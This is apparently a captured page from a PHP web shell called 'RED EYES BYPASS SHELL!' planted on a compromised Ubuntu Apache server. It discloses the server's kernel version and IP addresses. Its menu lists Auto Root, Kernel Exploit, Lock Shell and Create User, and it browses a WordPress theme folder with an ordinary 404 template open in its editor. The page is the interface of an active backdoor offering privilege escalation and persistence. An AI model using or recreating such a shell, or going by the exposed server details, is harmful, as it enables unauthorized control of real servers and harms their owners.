Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
grad /
new /
wp-content /
themes /
generatepress /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
404.php
790
B
-rwxr-xr-x
archive.php
1.41
KB
-rwxr-xr-x
comments.php
3.53
KB
-rwxr-xr-x
content-404.php
1.48
KB
-rwxr-xr-x
content-link.php
2.13
KB
-rwxr-xr-x
content-page.php
1.72
KB
-rwxr-xr-x
content-single.php
1.92
KB
-rwxr-xr-x
content.php
2.13
KB
-rwxr-xr-x
footer-min.php
289
B
-rwxr-xr-x
footer.php
906
B
-rwxr-xr-x
functions.php
3.5
KB
-rwxr-xr-x
header-min.php
567
B
-rwxr-xr-x
header.php
1.43
KB
-rwxr-xr-x
index.php
1.55
KB
-rwxr-xr-x
no-results.php
1.66
KB
-rwxr-xr-x
page.php
1.07
KB
-rwxr-xr-x
readme.txt
17.59
KB
-rwxr-xr-x
screenshot.png
69.02
KB
-rwxr-xr-x
search.php
1.24
KB
-rwxr-xr-x
searchform.php
1.4
KB
-rwxr-xr-x
sidebar-left.php
659
B
-rwxr-xr-x
sidebar.php
666
B
-rwxr-xr-x
single.php
898
B
-rwxr-xr-x
style.css
1.91
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content-404.php
<?php /** * The template for displaying 404 pages. * * @package GeneratePress */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } ?> <div class="inside-article"> <?php /** * generate_before_content hook. * * @since 0.1 * * @hooked generate_featured_page_header_inside_single - 10 */ do_action( 'generate_before_content' ); ?> <header <?php generate_do_attr( 'entry-header' ); ?>> <?php // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- HTML is allowed in filter here. ?> <h1 class="entry-title" itemprop="headline"><?php echo apply_filters( 'generate_404_title', __( 'Oops! That page can’t be found.', 'generatepress' ) ); ?></h1> </header> <?php /** * generate_after_entry_header hook. * * @since 0.1 * * @hooked generate_post_image - 10 */ do_action( 'generate_after_entry_header' ); $itemprop = ''; if ( 'microdata' === generate_get_schema_type() ) { $itemprop = ' itemprop="text"'; } ?> <div class="entry-content"<?php echo $itemprop; // phpcs:ignore -- No escaping needed. ?>> <?php printf( '<p>%s</p>', apply_filters( 'generate_404_text', __( 'It looks like nothing was found at this location. Maybe try searching?', 'generatepress' ) ) // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- HTML is allowed in filter here. ); get_search_form(); ?> </div> <?php /** * generate_after_content hook. * * @since 0.1 */ do_action( 'generate_after_content' ); ?> </div>
Close